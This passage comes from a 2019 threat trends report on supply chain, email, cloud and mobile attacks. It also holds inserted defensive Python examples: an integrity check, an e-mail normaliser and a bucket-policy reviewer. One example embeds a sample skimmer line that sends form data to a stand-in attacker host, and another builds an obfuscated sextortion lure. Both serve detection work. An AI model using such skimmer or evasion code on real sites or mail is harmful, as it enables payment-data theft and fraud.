CYBER ATTACK TRENDS: 2019 MID-YEAR REPORT

TABLE OF CONTENTS

Introduction
Software Supply Chain Attacks on the Rise
Email Scams Gear Up
Attacks Against Cloud Environments
The Evolving Mobile Landscape
Ongoing Trends
Cyber Attack Categories by Region
Global Threat Index Map
Top Malicious File Types (H1 2019)
Global Malware Statistics
    Top Malware Families
    Top Cryptomining Malware
    Top Banking Malware
    Top Botnet Malware
    Top Mobile Malware
Major Cyber Breaches (H1 2019)
High Profile Global Vulnerabilities
Appendix: Malware Family Descriptions

INTRODUCTION

The first half of 2019 demonstrated that no environment is immune to cyber attacks. We have witnessed threat actors developing new tool sets and techniques, targeting corporate assets stored on cloud infrastructure, individuals' mobile devices, trusted third-party suppliers' applications and even popular mail platforms.

One of the dominant ongoing trends in 2019 is targeted ransomware attacks. This year, collaboration between threat actors enabled even more destructive attacks that paralyzed numerous organizations worldwide. What ends with a ransomware attack usually starts with a quieter sequence of bot infections.

Still highly visible, cryptominers are in decline this year: only 21% of organizations worldwide were affected by cryptomining attacks, compared to 42% at the peak in 2018. This follows the shutdown of the CoinHive drive-by mining service.

Software supply chain attacks attracted public and government attention. In such attacks threat actors inject malicious code into components of legitimate applications, victimizing a large number of unsuspecting users.
The accumulation of several cases since the beginning of the year has led the US government to devote special attention to this evolving threat; it is expected to publish official recommendations on ways to minimize the impact of such attacks.

To provide organizations with the best level of protection, security experts should be attuned to the ever-changing landscape and the latest threats and attack methods. With data drawn from Check Point's ThreatCloud World Cyber Threat Map between January and June 2019, combined with primary research performed by the company's cyber security experts, this report provides a comprehensive overview of the trends observed in the categories of cryptominers, ransomware, botnets, banking Trojans, data breaches and mobile threats.

SOFTWARE SUPPLY CHAIN ATTACKS ON THE RISE

Growing cyber security awareness and the increasing use of security solutions have made cyber attack attempts more challenging and have pushed motivated threat actors to extend their attacks to new vectors. Focusing on the supply chain of a selected target is one such attempt. In software supply chain attacks the threat actor typically installs malicious code into legitimate software by modifying and infecting one of the building blocks the software relies upon. As with physical chains, software supply chains are only as strong as their weakest link.

Software supply chain attacks can be divided into two main categories. The first includes targeted attacks aiming to compromise well-defined targets, scanning their supplier lists in search of the weakest link through which to enter. The ShadowHammer attack on ASUS is a recent example. Attackers implanted malicious code into the ASUS Live Update utility, allowing them to later install backdoors on millions of remote computers.
Interestingly, the malicious implant included a hardcoded list of several hundred network adapter MAC addresses, which means second-stage backdoors could be surgically delivered to predefined targets.

The second category uses software supply chains to compromise as many victims as possible by locating a weak link with a large distribution radius. One such example is the attack on PrismWeb, an e-commerce platform, in which attackers injected a skimming script into the shared JavaScript libraries used by online stores, affecting more than 200 online university campus stores in North America. Many MageCart-style attacks use similar supply chain vectors.

The sharp increase in supply chain attacks led the US Department of Homeland Security (DHS) to establish the Information and Communications Technology Supply Chain Risk Management Task Force, which started its work earlier this year. In addition, on May 15 the White House issued an executive order declaring foreign supply chain threats a national emergency and empowering the Secretary of Commerce to prohibit transactions, later leading to a ban on the technology giant Huawei.

The mobile arena is also prone to supply chain attacks. Operation Sheep, as reviewed by Check Point Research, exposed the infected SWAnalytics SDK. Unsuspecting mobile app developers used this SDK and thus unknowingly helped distribute contact-harvesting malware to more than 100 million end users.

From the attacker's point of view this method has at least two distinct advantages: it relies on the good reputation of third-party vendors, and it multiplies circulation manifold by using the original vendor's distribution mechanism. The supply chain attack vector has been a growing trend for a while, but the reaction of US and international authorities testifies to both its magnitude and severity.
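The PrismWeb case above is the shared-library variant of this problem: a store trusts a JavaScript file it does not host. Subresource Integrity (SRI) is the browser-side control for exactly that trust. The following is an added example, not code from the report or from any of the affected platforms: it computes the integrity token a site would pin for a vetted copy of a library and then emulates the browser's check against a copy with a skimmer appended. The library text, the skimmer snippet and the host names are constructed placeholders.

```python
"""Subresource Integrity (SRI) as a control against tampered shared JavaScript.

Added example, not from the Check Point report. A site that loads a shared
library from a third party can pin the exact file it vetted with an integrity
attribute; a skimmer appended to that file then fails the browser's hash check
and does not execute. Library text, skimmer and host names are constructed.
"""
import base64
import hashlib
import re

SRI_ALGS = ("sha256", "sha384", "sha512")   # the only digests SRI accepts, weakest first

# Constructed stand-in for a shared checkout library served by a third party.
ORIGINAL_LIB = b"window.checkout = { pay: function (form) { return submitPayment(form); } };\n"

# Constructed MageCart-style skimmer an attacker appends to the same file.
SKIMMER = (b"document.addEventListener('submit', function (e) {"
           b" new Image().src = 'https://collector.attacker.example/c?d='"
           b" + encodeURIComponent(new URLSearchParams(new FormData(e.target)).toString()); });\n")


def sri_hash(content: bytes, alg: str = "sha384") -> str:
    """Return the SRI token '<alg>-<base64 digest>' for content."""
    if alg not in SRI_ALGS:
        raise ValueError(f"SRI permits only {SRI_ALGS}, got {alg!r}")
    digest = hashlib.new(alg, content).digest()
    return f"{alg}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes, alg: str = "sha384") -> str:
    """Emit the <script> tag that pins content; crossorigin is required for cross-origin SRI."""
    return (f'<script src="{src}" integrity="{sri_hash(content, alg)}" '
            f'crossorigin="anonymous"></script>')


def browser_would_execute(tag: str, fetched: bytes) -> bool:
    """Emulate the browser's decision: fetched bytes must match a token of the strongest listed algorithm.

    A tag without an integrity attribute is not checked at all, which is the
    state a store is in when it simply includes the vendor's script URL.
    """
    m = re.search(r'\bintegrity="([^"]*)"', tag)
    if m is None:
        return True
    tokens = m.group(1).split()
    recognised = [t.partition("-")[0] for t in tokens if t.partition("-")[0] in SRI_ALGS]
    if not recognised:
        return True   # unknown algorithms are ignored; nothing is enforced
    strongest = max(recognised, key=SRI_ALGS.index)
    expected = sri_hash(fetched, strongest)
    return any(t == expected for t in tokens if t.startswith(strongest + "-"))


if __name__ == "__main__":
    tag = script_tag("https://cdn.third-party.example/checkout.js", ORIGINAL_LIB)
    print(tag)
    print("clean library executes:   ", browser_would_execute(tag, ORIGINAL_LIB))
    print("skimmed library executes: ", browser_would_execute(tag, ORIGINAL_LIB + SKIMMER))
```

SRI protects only the pinned file: a store that loads the library without an integrity attribute, or whose first-party HTML is modified server-side, gets no benefit, and every legitimate library update requires re-vetting and a new hash. That operational cost is the reason shared libraries so often ship unpinned.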
The supply chain attack vector is more than just a dangerous technique; it strikes at the basic trust on which supplier-customer relations are built.

EMAIL SCAMS GEAR UP

It is safe to say there is no organization or individual that is not exposed to multiple malicious email campaigns at any given time. But with the growing attention of security vendors and public awareness of email attacks, threat actors have introduced improved phishing tactics aimed at establishing credibility with victims, as well as advanced evasion techniques to bypass mail security solutions.

With this shift, Check Point researchers witnessed a surge in the volume of sextortion scams and business email compromise (BEC), which trick victims into making a payment through blackmail or by convincingly impersonating others, respectively. Both scams adopt these elements and do not necessarily contain any malicious attachments or links, which makes them even harder to detect.

Email scammers have started to employ various evasion techniques designed to bypass security solutions and anti-spam filters. The evasions we detected included encoded emails, images of the message embedded in the email body, and complex underlying code that mixes plain-text letters with HTML character entities. Social engineering techniques, as well as varying and personalizing the content of the emails, are additional methods that allow scammers to fly under the radar of anti-spam filters and reach their targets' inboxes.

Determined to convince victims of their credibility, sextortion scammers this year did everything possible to make their victims worried enough to pay up and avoid publication of the alleged sexual material. This mainly includes presenting the victim's personal credentials as evidence, usually leaked in previous data breaches or purchased on underground forums.
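The entity-mixing and encoding evasions described above defeat filters that match on the raw message rather than on what the recipient sees. The following added example is not from the report or from Check Point: it constructs a sextortion-style lure whose HTML body is base64 transfer-encoded and whose key words are split with HTML character entities, an empty inline tag and a zero-width space, then shows that a keyword filter misses the raw bytes but catches the normalised visible text. The sender, recipient and lure wording are constructed.

```python
"""Normalise an obfuscated scam e-mail before running content filters.

Added example, not from the Check Point report. The message is constructed:
its HTML body is base64 transfer-encoded and the visible text is broken up
with HTML character entities, an inline tag and a zero-width space. A filter
run over the raw bytes sees nothing; the same filter run over the normalised
visible text catches the lure.
"""
import email
import html
import re
import unicodedata
from email import policy
from email.message import EmailMessage

# Constructed lure. "re<b></b>&#99;&#111;rded" and "Bit&#x63;&#8203;oin" render as
# "recorded" and "Bitcoin" but never appear as such in the transmitted bytes.
OBFUSCATED_HTML = (
    "<html><body><p>I have re<b></b>&#99;&#111;rded you. "
    "Send &#36;1&#44;000 in Bit&#x63;&#8203;oin to the address below "
    "or I pu&#98;lish the vid&#101;o to your con&#116;acts.</p></body></html>"
)

# Phrases a content filter might look for (lower case, matched on normalised text).
SCAM_TERMS = ("recorded you", "bitcoin", "publish the video")


def build_sample_message() -> bytes:
    """Serialise the constructed lure as a base64-encoded text/html message."""
    msg = EmailMessage()
    msg["From"] = "Security Desk <alerts@example.com>"   # constructed sender
    msg["To"] = "victim@example.org"                       # constructed recipient
    msg["Subject"] = "Regarding your device"
    msg.set_content(OBFUSCATED_HTML, subtype="html", cte="base64")
    return msg.as_bytes()


def visible_text(raw_message: bytes) -> str:
    """Return what the recipient actually reads, lower-cased and whitespace-collapsed.

    Order matters: the parser undoes the transfer encoding; tags are removed
    before entities are decoded so an entity-encoded '<' cannot smuggle a tag
    past the stripper; zero-width characters are dropped; NFKC folds look-alike
    code points such as fullwidth letters onto their ASCII forms.
    """
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body is not None else ""
    text = re.sub(r"</?(?:p|div|br|li|tr|h\d)\b[^>]*>", " ", text, flags=re.I)  # block tags -> space
    text = re.sub(r"<[^>]+>", "", text)                     # inline tags such as <b></b> -> nothing
    text = html.unescape(text)                              # &#99; -> c, &#x63; -> c, &#8203; -> U+200B
    text = re.sub(r"[\u200b\u200c\u200d\u2060\ufeff]", "", text)  # zero-width characters
    text = unicodedata.normalize("NFKC", text)
    return re.sub(r"\s+", " ", text).strip().lower()


def scam_terms_found(text: str) -> list:
    """Return the SCAM_TERMS present in text, in SCAM_TERMS order."""
    return [term for term in SCAM_TERMS if term in text]


if __name__ == "__main__":
    raw = build_sample_message()
    print("raw bytes match:  ", scam_terms_found(raw.decode("ascii").lower()))
    print("normalised match: ", scam_terms_found(visible_text(raw)))
```

The same normalisation belongs on the Subject and on any text recovered from embedded images; the image-in-body evasion mentioned above is invisible to a text pass like this one unless OCR output is fed into it.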
Other tactics, common mainly in BEC attacks, are domain and display-name spoofing, as well as sending the emails from valid high-reputation entities such as compromised Microsoft Office 365 or Gmail accounts. In April, one sextortion campaign went as far as pretending to be from the CIA, warning victims they were suspected of distributing and storing child pornography and demanding $10,000 in Bitcoin.

In a world where email scams have become a business in which professional cyber criminals are hired to run email campaigns, it is also safe to say that this industry is here to stay. Spammers will continue to improve their capabilities and techniques to ensure their scams' profitability, just as security vendors will continue to improve their products to protect against such threats.

ATTACKS AGAINST CLOUD ENVIRONMENTS

The growing popularity of public cloud environments has led to an increase in cyber attacks targeting resources and sensitive data residing within these platforms. Following the 2018 trend, misconfiguration and poor management of cloud resources remained the most prominent threat to the cloud ecosystem in 2019 and, as a result, subjected cloud assets to a wide array of attacks. This year, misconfigured cloud environments were one of the main causes of a vast number of data theft incidents experienced by organizations worldwide.

In April, more than half a billion records of Facebook users were exposed by a third party on unprotected Amazon cloud servers. Misconfigured Box accounts leaked terabytes of extremely sensitive data from many companies, and in another case sensitive financial information of 80 million Americans hosted on a Microsoft cloud server was exposed online.

Besides information theft, threat actors intentionally abuse cloud technologies for their computing power.
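Before turning to compute abuse, it is worth showing what the storage exposures above look like at the policy level, since they typically trace back to a single statement granting read access to a wildcard principal. The following added example is not from the report or from any cloud provider's tooling: it reviews an S3-style bucket policy document offline and reports, per Allow statement, whether it is PUBLIC, CONDITIONAL (wildcard principal but limited by a Condition block, review needed) or SCOPED (named principal). The bucket name, account ID, role name and VPC endpoint ID in the sample policies are constructed.

```python
"""Flag public-read statements in an S3 bucket policy, offline.

Added example, not from the Check Point report. Parses a bucket policy
document and reports per Allow statement whether it is PUBLIC, CONDITIONAL
or SCOPED. Bucket name, account ID, role and endpoint IDs are constructed.
"""
import json

READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:get*", "s3:list*", "s3:*", "*"}


def _as_list(value):
    """Policy fields may be a scalar or a list; treat both uniformly."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _wildcard_principal(principal) -> bool:
    """True for "Principal": "*" or {"AWS": "*"}: anyone, anonymous callers included."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS"))


def _grants_read(actions) -> bool:
    return any(a.lower() in READ_ACTIONS for a in _as_list(actions))


def review_policy(policy_json: str) -> list:
    """Return [(Sid, verdict), ...] for each Allow statement that grants read access."""
    policy = json.loads(policy_json)
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow" or not _grants_read(stmt.get("Action")):
            continue
        sid = stmt.get("Sid", f"Statement{i}")
        if _wildcard_principal(stmt.get("Principal")):
            verdict = "CONDITIONAL" if stmt.get("Condition") else "PUBLIC"
        else:
            verdict = "SCOPED"
        findings.append((sid, verdict))
    return findings


def is_public(policy_json: str) -> bool:
    return any(v == "PUBLIC" for _, v in review_policy(policy_json))


# Constructed weak policy: the "make it work" change that exposes every object to the Internet.
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject"],
        "Resource": "arn:aws:s3:::example-records-bucket/*",
    }],
})

# Constructed corrected policy: only a named application role may read.
FIXED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AppRead",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::111122223333:role/records-reader"},
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-records-bucket",
                     "arn:aws:s3:::example-records-bucket/*"],
    }],
})

# Constructed wildcard-with-condition policy: reachable only through one VPC endpoint.
# Not public, but flagged for a human look rather than silently accepted.
CONDITIONAL_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "VpcOnly",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::example-records-bucket/*",
        "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}},
    }],
})

if __name__ == "__main__":
    for name, doc in (("weak", WEAK_POLICY), ("fixed", FIXED_POLICY),
                      ("conditional", CONDITIONAL_POLICY)):
        print(f"{name:12} {review_policy(doc)}")
```

A bucket policy is only one layer. Object ACLs and the account-level S3 Block Public Access settings need to be checked alongside it, and the CONDITIONAL verdict is deliberately not treated as safe: a condition such as a broad aws:SourceIp range can leave a wildcard grant effectively public.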
So far this year, cloud cryptomining campaigns have stepped up, upgraded their technique set and proven capable of evading basic cloud security products, abusing hundreds of vulnerable exposed Docker hosts and even shutting down competitors' cryptomining campaigns operating in the cloud.

In addition, in 2019 Check Point researchers witnessed an increase in the number of exploitations against public cloud infrastructures. A vulnerability in the SoftNAS Cloud platform discovered in March may have allowed attackers to bypass authentication, gain access to a company's web-based admin interface and then run arbitrary commands. Furthermore, a new type of attack vector, dubbed Cloudborne, demonstrated that hardware re-provisioned to new customers could retain backdoors that can be used to attack future users of the compromised system.

With the number of enterprises migrating their storage and computing infrastructure to the cloud increasing, best security practices must be followed and proper solutions implemented in order to prevent the next massive data breach.

THE EVOLVING MOBILE LANDSCAPE

Since so much of our personal and business lives is managed and stored on mobile devices, threat actors are today highly motivated to launch a wide range of attacks: profitable advertising campaigns, theft of sensitive credentials through fake apps, and surveillance operations are just some of the exploits conducted. So far this year we have seen more and more malicious actors adapting techniques and methods from the general threat landscape to the mobile world.

Banking malware, one of the most popular malware types, has successfully infiltrated the mobile arena, with a sharp rise of more than 50% compared to 2018.
In correlation with the growing use of banks' mobile applications, malware capable of stealing payment data, credentials and funds from victims' bank accounts has been pushed from the general threat landscape and become a very common mobile threat too. The methodology used to distribute banking malware has also been borrowed from the general threat landscape: malware builders available for purchase on underground forums. In this way the builders of mobile bankers such as Asacub and Anubis allow anyone willing to pay to create new versions of this malware, ready for mass distribution.

Another interesting element observed so far this year, and inspired by the general threat landscape, is the dawn of the evasion era for the mobile arena. From delayed execution to avoid sandboxes, through transparent icons with empty application labels, to encrypting the malicious payload, it is quite evident that cyber criminals have boosted their skill sets and creativity for mobile attacks, determined to evade detection while keeping their malware persistent and effective. This year, two fake applications were discovered on Google Play that monitor the device's motion sensors to evade security emulators. Furthermore, in March a new Android Trojan dubbed Gustuff was introduced, capable of targeting customers of leading international banks and featuring various evasion techniques, including turning off Google Play Protect, the built-in anti-malware protection on Android.

So after probing the mobile field, threat actors are stepping up their efforts, and as a result we can expect mobile attacks to rise in the months and years ahead.

ONGOING TRENDS

In addition to the major trends above, three other cyber trends of 2018 remain very relevant in 2019.
The targeted ransomware approach, which gained popularity during 2018, has proven effective in 2019; not a week goes by without some kind of tailored, destructive ransomware attack hitting the headlines. One prominent attack chain uses Emotet's vast distribution and victim base to select lucrative targets. Emotet is used to spread TrickBot within the compromised corporate network, which in turn deploys Ryuk or other ransomware as the final payload. From countless local government entities through a cloud hosting provider, industrial corporations and airports, this year every organization is a potential target of targeted ransomware, led by Ryuk and LockerGoga.

The infamous cryptominers remained a prevalent malware type in the first half of